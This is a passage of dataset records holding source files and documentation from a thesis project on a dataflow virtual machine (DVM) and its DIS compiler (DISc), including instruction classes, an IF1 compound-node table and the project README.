The switch is the\n# actual select while the sink will be the exit point\n# of any results coming out of the compound node.\n#\n# We register the switch as the destination for any incoming links\n# while the sink is registered as the source of outgoing links.\n#\n# Next, we simply ensure all the subgraphs link to the shared sink,\n# and compile the subgraphs.\n#\n# Finally, we get the dis addresses of the possible destinations, after\n# which we add them to the destination list of the switch node.\n##\ndef convertSelectNode(dis, node):\n\tswitch = dis.addInstruction(0, 'SWI', [])\n\tsink = dis.addInstruction(0, 'SNK', [])\n\tdis.linkNode(node, switch, sink)\n\n\tidx = dis.getIdx(0) - 1\n\tselectStart(dis, node)\n\tgraphConverter.convertSubGraphs(node.subGraphs[1:], dis)\n\tselectStop(dis, node, idx)\n\n# ---------- #\n# Forin Node #\n# ---------- #\n\ndef convertForAllNode(dis, node):\n\tdis.addNewlines()\n\tdis.addCommentLines(\"Starting for...in\")\n\tbgn = dis.addInstruction(0, 'SNK', [])\n\tend = dis.addInstruction(0, 'SNK', [])\n\tdis.linkNode(node, bgn, end)\n\n\tdis.indent += 1\n\n\tinputs = node.inputs + 1\n\n\tsplits = [dis.addInstruction(1, 'SPL', [inputs]) for e in node.map]\n\tstopIdx = dis.getIdx(1)\n\tstartIdx = stopIdx - len(node.map) + 1\n\n\tfor key in splits:\n\t\tfor i in xrange(0, inputs):\n\t\t\tdis.addLink(bgn, i, key, i)\n\n\tgen = node.subGraphs[0]\n\tdis.linkNode(gen.exit, bgn, bgn)\n\tgen.removeNode(gen.exit)\n\tgraphConverter.convertSubGraphs(node.subGraphs[0:1], dis)\n\n\tgraphConverter.convertSubGraphs(node.subGraphs[3:], dis)\n\n\tret = node.subGraphs[2]\n\tdis.linkNode(ret.exit, end, end)\n\tret.removeNode(ret.exit)\n\tgraphConverter.convertSubGraphs(node.subGraphs[2:3], dis)\n\n\tfor key, idx in zip(node.map,xrange(startIdx, stopIdx + 1)):\n\t\tsink, merge = node.map[key]\n\t\tdstChunk, dstInst = dis.getToKey(sink)\n\t\tmergeChunk, mergeInst = dis.getToKey(merge)\n\n\t\tdis.modifyString(1, idx, \n\t\t\tlambda str : str + \" %s %s %s %s\" % \n\t\t\t(dstChunk, dstInst, mergeChunk, mergeInst))\n\n\tdis.indent -= 1\n\n# ------- #\n# General #\n# ------- #\n\nconverters = {\n\t'select' : convertSelectNode,\n\t'forall' : convertForAllNode\n}\n\n##\n# Add the DIS equivalent of a certain node\n# to a DIS object.\n#\n# \\param dis\n#\t\tA DIS instance that will contain the DIS version\n#\t\tof the node.\n# \\param node\n#\t\tThe node to convert.\n##\ndef convertNode(dis, node):\n\treturn converters[node.type](dis, node)" }, { "alpha_fraction": 0.7217537760734558, "alphanum_fraction": 0.7268128395080566, "avg_line_length": 28.649999618530273, "blob_id": "e05431d4e6ed6d916778114cdb16b1ffc694e327", "content_id": "353073a95a516f5bacd45a63827a9ad41235031e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2372, "license_type": "no_license", "max_line_length": 85, "num_lines": 80, "path": "/DISc/backEnd/DVM/dvm.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# dvm.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject
to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.dvm\n# \\brief dvm interface\n#\n# This module provides a few convenient shorthands\n# for calling DVM.\n##\n\nimport subprocess\n\nimport logging\nlog = logging.getLogger(__name__)\n\n## Default dvm path.\npath = 'dvm'\n\n## Default amount of cores to use.\ncores = 8\n\n## Default loglevel to use.\nlogLevel = 50\n\n##\n# Run DVM on a dis string, with inputs,\n# and return the results.\n#\n# \\param dvmPath\n#\t\tThe path to dvm, if dvm is not in your system PATH\n# \\param inputs\n#\t\tThe list of inputs to pass to dvm\n# \\param dis\n#\t\tA string containing the dis representation of the code to execute.\n# \\param cores\n#\t\tThe amount of cores to use when running dvm.\n# \\param logLevel\n#\t\tThe loglevel to pass to DVM (useful for debugging)\n#\n# \\return\n#\t\tThe output returned by dvm, as a python object.\n##\ndef run(dvmPath = path, inputs = [], dis = None, cores = cores, logLevel = logLevel):\n\targs = [dvmPath, \"-\", \"-c\", str(cores), \"-ll\", str(logLevel)]\n\n\tfor e in inputs:\n\t\targs.append(\"-i\")\n\t\targs.append(str(e))\n\n\tdvm = subprocess.Popen(args, stdout=subprocess.PIPE,stdin=subprocess.PIPE)\n\tres = dvm.communicate(dis)\n\tret = dvm.returncode\n\n\tif ret:\n\t\tlog.error(\"DVM returned non-zero return code %d\", ret)\n\treturn res[0].strip()\n" }, { "alpha_fraction": 0.6802837252616882, "alphanum_fraction": 0.6832465529441833, "avg_line_length": 25.14788818359375, "blob_id": "ae9becc0c952b88a48ca9820fff3c886a340ab97", "content_id": "353def3c0573d11d933c6b27443e3b735a65bc72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11138, "license_type": "no_license", "max_line_length": 81, "num_lines": 426, "path": "/DVM/core/instruction.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# instructions.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.instruction\n# \\brief DVM instruction definitions\n#\n# This module defines the various instruction types.\n# \n# Any instruction has to inherit from the Instruction class\n# and implement its unimplemented methods. \n# An instruction can take on additional properties by inheriting\n# from any of the extra types.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n# -------------------- #\n# Abstract Instruction #\n# -------------------- #\n\n##\n# General DVM instruction.\n#\n# Defines an interface that all instructions should\n# implement.\n#\n# An instruction is the bread and butter of DVM.\n# It accepts some tokens, and returns some new tokens\n# afterwards.\n##\nclass Instruction(object):\n\tdef __init__(self, chunk = 0):\n\t\tsuper(Instruction, self).__init__()\n\t\tself.chunk = chunk\n\t\tself.key = None\n\n\t## Set the instruction address \n\tdef setKey(self, key):\n\t\tself.key = key\n\n\t## Return a string representation of this instruction.\n\tdef __str__(self):\n\t\tname = self.__class__.__name__\n\t\treturn name + \" \" + \"'\" + str(self.key) + \"'\"\n\t##\n\t# Execute an instruction with a given input\n\t# and a core.\n\t#\n\t# \\param input\n\t#\t\tA token, or a list of tokens, depending\n\t#\t\ton the instruction type.\n\t# \\param core\n\t#\t\tThe core where we execute this\n\t##\n\tdef execute(self, input, core): pass\n\n# ----------- #\n# Extra Types #\n# ----------- #\n\n## Instruction that accepts a literal\nclass Literal(object):\n\t##\n\t# Add a literal to the operation.\n\t# An instruction should never accept only\n\t# literals.\n\t# Not all instructions accept literals.\n\t##\n\tdef addLiteral(self, port, val): pass\n\n## \n# An instruction that inherits from this class\n# promises to send its output to a destination\n# that can be added through the addDestination method.\n##\nclass Destination(object):\n\n\t##\n\t# Add a destination to this instruction.\n\t#\n\t# \\param port\n\t# \t\tThe output port to link *from*\n\t# \\param toInst\n\t#\t\tThe instruction to send to\n\t# \\param toPort\n\t#\t\tThe port on this instruction to send to.\n\t##\n\tdef addDestination(self, outPort, inst, toPort): pass\n\n\t##\n\t# Send a datum to any destination of a given output port.\n\t#\n\t# \\param datum\n\t#\t\tThe piece of data to send.\n\t# \\param core\n\t#\t\tThe currently active core.\n\t# \\param port\n\t#\t\tThe port that we send outputs from.\n\t# \\param cont\n\t#\t\tThe context of the output.\n\t##\n\tdef sendDatum(self, datum, core, port, cont): pass\n\n##\n# DVM instruction that sends any token it produces\n# to all of the members of its destination list.\n##\nclass DestinationList(Destination):\n\tdef __init__(self):\n\t\tsuper(DestinationList, self).__init__()\n\t\tself.destinations = []\n\n\tdef addDestination(self, _, inst, port):\n\t\tself.destinations.append((inst, port))\n\n\tdef sendDatum(self, datum, core, _, cont):\n\t\tfor dst in self.destinations:\n\t\t\tinst = dst[0]\n\t\t\tport = dst[1]\n\t\t\tcore.tokenizer.simple(\n\t\t\t\tdatum, inst, port, cont)\n\n##\n# DVM instruction that sends output it produces\n# to a destination based on the output port of \n# the output.\n##\nclass DestinationMap(Destination):\n\tdef __init__(self):\n\t\tsuper(DestinationMap, self).__init__()\n\t\tself.destinations = {}\n\n\tdef addDestination(self, port, toInst, toPort):\n\t\tif port in self.destinations:\n\t\t\tself.destinations[port] += [(toInst, toPort)]\n\t\telse:\n\t\t\tself.destinations.update({port : [(toInst, toPort)]})\n\n\tdef sendDatum(self, datum, core, port, cont):\n\t\ttry:\n\t\t\tfor dst in self.destinations[port]:\n\t\t\t\tinst = dst[0]\n\t\t\t\tport = dst[1]\n\t\t\t\tcore.tokenizer.simple(\n\t\t\t\t\tdatum, inst, port, cont)\n\t\texcept KeyError:\n\t\t\tpass\n\n\n# ---------- #\n# Operations #\n# ---------- #\n\n##\n# An operation instruction defines a single operation\n# on all of its inputs.\n##\nclass OperationInstruction(Instruction, DestinationList, Literal):\n\tdef __init__(self, operation, inputs):\n\t\tsuper(OperationInstruction, self).__init__(chunk = 1)\n\t\tself.totalInputs = inputs\n\t\tself.realInputs = inputs\n\t\tself.operation = operation\n\t\tself.litLst = [None] * inputs\n\n\tdef addLiteral(self, port, val):\n\t\tself.litLst[port] = val\n\t\tself.realInputs -= 1\n\n\t##\n\t# Replace all empty places in the \n\t# argument list by literals, extract\n\t# the datum from tokens and get the context\n\t# from one of the tokens.\n\t##\n\tdef createArgLst(self, args):\n\t\tcont = None\n\n\t\tfor i in xrange(0, len(args)):\n\t\t\tel = args[i]\n\t\t\tif el:\n\t\t\t\tcont = el.tag.cont\n\t\t\t\targs[i] = el.datum\n\t\t\telse: \n\t\t\t\targs[i] = self.litLst[i]\n\n\t\treturn (cont, args)\n\n\tdef execute(self, tokens, core):\n\t\tlog.info(\"executing %s\", self)\n\t\tcont, lst = self.createArgLst(tokens)\n\t\tres = self.operation(*lst)\n\t\tself.sendDatum(res, core, None, cont)\t\t\n\n# -------- # \n# Constant #\n# -------- #\n\n##\n# Constant instruction.\n#\n# A special sink that always sends its value\n# to its destinations when it encounters input.\n# This is not really 'nice' according to dataflow \n# semantics but necessary to allow literals that cannot\n# be propagated.\n#\n# The constant instruction will only send its value\n# when receiving data on port 0. This allows it to\n# only generate a single token when it is placed \n# after a switch statement \n# (which is the only place where it should occur).\n##\nclass Constant(Instruction, DestinationList):\n\tdef __init__(self, value):\n\t\tsuper(Constant, self).__init__()\n\t\tself.value = value\n\n\tdef execute(self, token, core):\n\t\tif token.tag.port == 0:\n\t\t\tself.sendDatum(self.value, core, None, token.tag.cont)\n\n# ----- #\n# Sinks #\n# ----- #\n\n##\n# Sink instruction.\n#\n# A sink is an instruction that only serves\n# to forward any input it receives to its destinations.\n##\nclass Sink(Instruction, DestinationMap):\n\tdef __init__(self):\n\t\tsuper(Sink, self).__init__()\n\n\tdef execute(self, token, core):\n\t\tport = token.tag.port\n\t\tcont = token.tag.cont\n\t\tdatum = token.datum\n\t\tself.sendDatum(datum, core, port, cont)\n\n# -------------- #\n# Context Change #\n# -------------- #\n\n##\n# Represents a context change in the program.\n# e.g. a function call.\n##\nclass ContextChange(Instruction, Literal):\n\n\t##\n\t# Initialize a context change instruction.\n\t#\n\t# \\param binds\n\t#\t\tThe amount of tokens to bind to a new\n\t#\t\tcontext.\n\t# \\param restores\n\t#\t\tThe amount of tokens the context will\n\t#\t\tproduce before being deleted.\n\t# \\param destSink\n\t#\t\tThe destination of the token after\n\t#\t\tthe context change.\n\t# \\param returnSink\n\t#\t\tThe destination of the tokens \n\t#\t\t**after** their context is restored.\n\t##\n\tdef __init__(self, binds, restores, destSink, returnSink):\n\t\tsuper(ContextChange, self).__init__()\n\t\tself.retnSink = returnSink\n\t\tself.destSink = destSink\n\t\tself.restores = restores\n\t\tself.bindargs = binds\n\t\tself.literals = {}\n\n\tdef addLiteral(self, port, val):\n\t\tself.literals.update({port : val})\n\t\tself.bindargs -= 1\n\n\tdef getLiterals(self):\n\t\treturn self.literals\n\n\tdef execute(self, token, core):\n\t\tlog.info(\"%s, changing context of: %s\", self, token)\n\t\tcore.tokenizer.contexts.bindMany(\n\t\t\ttoken, self, \n\t\t\tself.destSink, self.retnSink, \n\t\t\tself.bindargs, self.restores)\n\n# --------------- #\n# Context Restore #\n# --------------- #\n\n##\n# Represents the restoration of context.\n# e.g. returning from a function.\n##\nclass ContextRestore(Instruction):\n\tdef execute(self, token, core):\n\t\tlog.info(\"%s, restoring: %s\", self, token)\n\t\tcore.tokenizer.contexts.restore(token)\n\n# ------ #\n# Switch #\n# ------ #\n\n##\n# Represents an instruction that will dynamically\n# determine the destination of its tokens at runtime.\n#\n# The value of the token arriving at port 0 will determine\n# the next goal of the tokens. Tokens that arrive before this\n# token will be stored until their destination is resolved.\n#\n# This value should be an index corresponding to an entry in\n# the dstLst of the instruction. This entry is the destination of\n# the tokens that this instruction receives (for this context).\n##\nclass Switch(Instruction):\n\n\tdef __init__(self, dstLst):\n\t\tsuper(Switch, self).__init__()\n\t\tself.dstLst = dstLst\n\n\tdef getDst(self, token):\n\t\ttry:\n\t\t\treturn self.dstLst[token.datum]\n\t\texcept IndexError:\n\t\t\tlog.info(\"%s: Invalid switch destination idx: %s, using 0\", self, token.datum)\n\t\t\treturn self.dstLst[0]\n\n\tdef execute(self, token, core):\n\t\tport = token.tag.port\n\n\t\tif port == 0:\n\t\t\tcnt = token.tag.cont\n\t\t\tdst = self.getDst(token)\n\t\t\tlog.info(\"%s, switching to destination %s, for context %s\", self, dst, cnt)\n\t\t\tcore.tokenizer.switcher.set(self, cnt, dst)\n\t\tcore.tokenizer.switcher.switch(token, self)\n\n# ----- #\n# Split #\n# ----- #\n\n##\n# Split instruction.\n#\n# This receives at least one input.\n# The argument sent to port 0 should be a compound data type.\n#\n# Upon executing, the element at port 0 will be 'split',\n# all of its elements will be sent to port 0 of the destSink,\n# with a new context. All of the other arguments will also be sent to the sink.\n#\n# Upon reaching a context restore, the resulting tokens will each receive a port\n# matching their index in the split array.\n##\nclass Split(Instruction):\n\t\n\tdef __init__(self, binds, dest, merge):\n\t\tsuper(Split, self).__init__(chunk = 1)\n\t\tself.totalInputs = binds\n\t\tself.realInputs = binds\n\t\tself.merge = merge\n\t\tself.dest = dest\n\n\tdef execute(self, tokens, core):\n\t\tlog.info(\"%s, splitting compound: %s\", self, tokens)\n\t\tcont = tokens[0].tag.cont\n\t\tcomp = tokens[0].datum\n\t\targs = tokens[1:]\n\t\tleng = len(comp)\n\n\t\tcore.matcher.setKey(self.merge, cont, leng)\n\n\t\t# Split the compound and send its elements\n\t\t# and the args to the destSink\n\t\tfor idx in xrange(0, leng):\n\t\t\telm = comp[idx]\n\t\t\tnewCont, newCore = core.tokenizer.contexts.bind(self.merge, idx, cont, 1)\n\t\t\tcore.tokenizer.simple(elm, self.dest, 0, newCont, newCore)\n\t\t\t\n\t\t\tfor arg in args:\n\t\t\t\tcore.tokenizer.simple(arg.datum, self.dest, arg.tag.port, newCont, newCore)\n\n# ---------------- #\n# Stop Instruction #\n# ---------------- #\n\n##\n# Represents the end of the program.\n# Any input of this instruction is considered to be\n# the result of the program.\n##\nclass StopInstruction(Instruction):\n\tdef execute(self, token, core):\n\t\tlog.info(\"%s reached stop instruction: %s\", token, self)\n\t\tcore.tokenizer.stopToken(token)" }, { "alpha_fraction": 0.759604811668396, "alphanum_fraction": 0.7644346952438354, "avg_line_length": 65.01449584960938, "blob_id": "e8f74cea5ca871fc9cc02523c7869964ebfac379", "content_id": "8918fa5c1926f73e72a30f758a31461b14f4193b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4555, "license_type": "no_license", "max_line_length": 725, "num_lines": 69, "path": "/doc/main.md", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "<!-- Written by Mathijs Saey at the VUB, all rights reserved -->\n\n[TOC]\n\n# Introduction {#Introduction}\n\nThis is the main documentation of the [dataflow software stack](https://github.com/mathsaey/Dataflow-Software-Stack), created by Mathijs Saey for his thesis at the VUB. \n\nThese pages serve a number of purposes:\n* [Provide a basic overview about the dataflow software stack.](#About)\n* [Provide a high-level overview of the code base.](#Structure)\n* [Collect the available documentation on the code base](files.html)\n* [Collect all the necessary information to get the software stack up and running](#Start)\n* [Collect references and examples that can come in handy while working on DVM.](pages.html)\n\n# About the Software Stack {#About}\n\nThe main goal of the dataflow software stack was to experiment with a prototypical implementation of a dataflow virtual machine and a compiler that generates input for such a machine. As the name implies, this machine utilizes the [dataflow architecture](http://en.wikipedia.org/wiki/Dataflow_architecture) to achieve a high amount of parallelism. Concretely, our compiler accepts IF1, which it transforms into [DIS](md_doc__d_i_s.html), a low-level dataflow language. Afterwards, this DIS program can be utilized by DVM to execute our program. Utilizing DIS instead of a more traditional low-level language such as x86 allows us to keep track of the data dependencies in the program on every level of the software stack.\n\n## Dataflow {#Dataflow}\n<img style=\"float: right\" src=\"simpleStatic.png\"/>\n\nIn short, the general idea behind [dataflow](http://en.wikipedia.org/wiki/Dataflow_architecture) is that an instruction in the program is executed once its inputs are ready. This property allows us to exploit the implicit parallelism of programs. A dataflow program can be represented as a graph; in such a graph, nodes represent operations while edges represent data dependencies between these operations.\n\nA visual representation of such a dataflow graph can be seen to the right of this section. This graph was generated from the following Sisal code.\n\n~~~\nfunction main(a, b, c, d : integer returns integer)\n\tlet \n\t\tab := a + b;\n\t\tcd := c + d\n\tin \n\t\tab + cd \n\tend let\nend function\n~~~\n\nAs we can see, this program simply takes 4 inputs, and adds all of these together. The generated dataflow graph shows us that both of the additions could be carried out in parallel.\n\n## Sisal and IF1 {#IF1}\n\n[Sisal](http://en.wikipedia.org/wiki/SISAL) is a language designed to be a high level variant for languages such as PASCAL that can work on multicore machines. During the first compilation phase sisalc (the sisal compiler) compiles Sisal to IF1, an intermediate language, which represents the sisal source code as a dataflow graph. \n\nOur research is focused on the compilation and execution of a dataflow program, and not on the design of a dataflow language. For this reason, we decided to use IF1 as the primary input language of our software stack. Incorporating [sisalc](http://sourceforge.net/projects/sisal/) offers us a high-level language for writing dataflow programs, along with a compiler that removes the complexity of the language for us.\n\nMore information about IF1 along with some sisal and IF1 code samples can be found in the [IF1 overview](md_doc__i_f1.html). \n\n# Getting started {#Start}\n\nRunning DVM and DISc is quite trivial at the moment. All you need is a working [python](http://www.python.org/) interpreter. Man pages for DVM and DISc can be found in the [resources folder of the repository](https://github.com/mathsaey/Dataflow-Software-Stack/tree/master/res).\n\nYou need to install [sisalc](http://sourceforge.net/projects/sisal/), the sisal C compiler, if you want to produce your own IF1 files from sisal source code.\n\nThe sites of all these tools and the used versions can be found below:\n\nTool | Version | Website\n---------|---------|--------\n`sisalc` | 14.1.0 | http://sourceforge.net/projects/sisal/\n`python` | 2.7.6 | http://www.python.org/\n\n# Overall Structure {#Structure}\n\nOur stack is split into 2 components.\n\n* DVM, the actual execution engine, which accepts [DIS](md_doc__d_i_s.html) as input.\n* DISc, a DIS compiler built on IGR.
This is based on 3 foundations:\n\t* IGR, the Intermediate Graph Representation, a flexible, graph-based representation that is the foundation of our compiler.\n\t* An easily extensible set of front-ends that parse a source language and turn it into IGR.\n\t* An extensible set of back-ends that apply a few transformations to IGR, before mapping it to DIS.\n" }, { "alpha_fraction": 0.7941176295280457, "alphanum_fraction": 0.797537624835968, "avg_line_length": 90.4375, "blob_id": "6492b4301fa039a49c3c1c093e1861aa69affb0d", "content_id": "c04c8ea860d3aab6745b2cdc705d18a37098ad93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1462, "license_type": "no_license", "max_line_length": 424, "num_lines": 16, "path": "/README.md", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# About\n\nThis is the repository of the master's thesis of Mathijs Saey at the Vrije Universiteit Brussel. The goal of this thesis was the creation of a dataflow software stack on modern hardware. Concretely, this repo contains a prototypical Dataflow Virtual Machine (DVM), alongside a compiler (DISc), which can transform a subset of (Sisal/IF1) programs into valid DVM programs. \n\n## [Dataflow](http://en.wikipedia.org/wiki/Dataflow_architecture)\n\nThe dataflow architecture is a computer architecture which differs from the more traditional von Neumann architecture. \nThe idea behind dataflow is that instructions are executed when all of the data they depend on is available.\n\n## IF1 and [Sisal](http://en.wikipedia.org/wiki/SISAL)\n\nSisal (Streams and Iteration in a Single Assignment Language) is an implicitly parallel language designed to be a high level variant for languages such as PASCAL that can work on multicore machines. During the first compilation phase sisalc (the sisal compiler) compiles Sisal to IF1, an intermediate language, which represents the sisal source code as a dataflow graph. We can utilize IF1 as an input to our software stack.\n\n# Getting Started.\n\nIf you are interested in working with or using DVM or DISc, you should look at the [documentation](http://mathsaey.github.io/Dataflow-Software-Stack/index.html). It contains the complete DVM and DISc documentation, a detailed IF1 overview and a guide to get DVM and DISc up and running." 
}, { "alpha_fraction": 0.7042175531387329, "alphanum_fraction": 0.7164261937141418, "avg_line_length": 29.049999237060547, "blob_id": "b1fb0517ac15fb5767b0259c83c724f0f6c7b9cc", "content_id": "14bac2c6b2c19a29cf3c657a270436e4f90c1731", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1802, "license_type": "no_license", "max_line_length": 79, "num_lines": 60, "path": "/DISc/frontEnd/IF1/compound.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# operations.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.compound\n# \\brief Compound node reference\n# \n# This module maps the IF1 compound nodes to \n# their IGR counterparts.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n## Various IGR compound nodes.\n__COMPOUNDS__ = {\n\t0 : 'forall',\n\t1 : 'select',\n\t2 : 'tagCase',\n\t3 : 'LoopA',\n\t4 : 'loopB',\n\t5 : 'ifThenElse',\n\t6 : 'iterate',\n\t7 : 'while',\n\t8 : 'repeat',\n\t9 : 'seqForAll',\n\t10 : 'uReduce'\n}\n\ndef getCompound(label, ctr = \"?\"):\n\tkey = int(label)\n\ttry:\n\t\tconstructor = __COMPOUNDS__[key]\n\texcept KeyError:\n\t\tlog.error(\"Line %d: Cannot find compound node with label: %s\", ctr, label)\n\telse: \n\t\treturn constructor" }, { "alpha_fraction": 0.6831232309341431, "alphanum_fraction": 0.6860994100570679, "avg_line_length": 24.734233856201172, "blob_id": "462a0b0c77ef6662ef833614ddb5c5c82795373c", "content_id": "10cb8edbe119561f56e7921b6a9d4ebd8031a698", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5712, "license_type": "no_license", "max_line_length": 89, "num_lines": 222, "path": "/DVM/core/runtime.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# runtime.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above 
copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.runtime\n# \\brief DVM runtime core\n# \n# This module defines the runtime. \n# The runtime is responsible for dispatching tokens,\n# matching tokens by their contexts and for scheduling\n# instructions that are ready to execute.\n#\n# Multiple runtime \"cores\" are active at any given time, depending\n# on the system. It is the responsibility of the runtime to find a\n# decent load balance accross these cores.\n##\n\nimport token\nimport random\nimport memory\nimport multiprocessing\n\nfrom context import ContextCreator\nfrom scheduler import Scheduler\nfrom dispatcher import TokenDispatcher\nfrom tokenizer import Tokenizer\nfrom contextMatcher import ContextMatcher\n\nimport logging\nlog = logging.getLogger(__name__)\n\n# ------------- #\n# Runtime Class #\n# ------------- #\n\n##\n# Runtime core.\n#\n# A runtime core is a worker unit in DVM.\n# It defines it's own scheduler, matcher and\n# token dispatcher and it has a static copy of the\n# instruction memory.\n##\nclass Core(object):\n\t##\n\t# Initialize a core.\n\t#\n\t# This method only initializes all the components of the\n\t# core that are not dependent on multiprocessing elements.\n\t#\n\t# \\param identifier\n\t#\t\tThe identifier of this core, this identifier should be unique \n\t#\t\tand it should match the identifier of this core in the collection\n\t#\t\tof all the cores.\n\t# \\param memory\n\t#\t\tA reference to the static instruction memory.\n\t##\n\tdef __init__(self, identifier, memory):\n\t\tsuper(Core, self).__init__()\n\t\tlog.info(\"Initializing core: %d\", identifier)\n\n\t\t## Instruction memory\n\t\tself.memory = memory\n\t\t## Identifier of this core. 
(integer)\n\t\tself.identifier = identifier\n\t\t## See if this core is running.\n\t\tself.active = True\n\t\t## Message Queues of the other cores\n\t\tself.cores = None\n\t\t## Highest index of the core array\n\t\tself.maxIdx = None\n\n\t\t## Message Queue of this core\n\t\tself.inbox = multiprocessing.Queue()\n\t\t## Context creator for this core\n\t\tself.contextCreator = ContextCreator(self)\n\t\t## Tokenizer for this core\n\t\tself.tokenizer = Tokenizer(self)\n\t\t## Token dispatcher for this core\n\t\tself.dispatcher = TokenDispatcher(self)\n\t\t## Scheduler for this core\n\t\tself.scheduler = Scheduler(self)\n\t\t## Context matcher for this core\n\t\tself.matcher = ContextMatcher(self)\n\n\t## String representation of a core.\n\tdef __str__(self):\n\t\treturn \"Core: \" + str(self.identifier)\n\n\t## See if 2 cores are equal\n\tdef __eq__(self, other):\n\t\treturn self.identifier == other.identifier\n\n\t##\n\t# Add a token to the inbox of a core.\n\t#\n\t# \\param token\n\t#\t\tThe token to add.\n\t# \\param core\n\t#\t\tThe core to add the token to.\n\t#\t\tThe current core will be used if \n\t#\t\tthis argument is not added.\n\t#\n\tdef add(self, token, core = None):\n\t\tif core != None:\n\t\t\tself.cores[core].put(token)\n\t\telse: 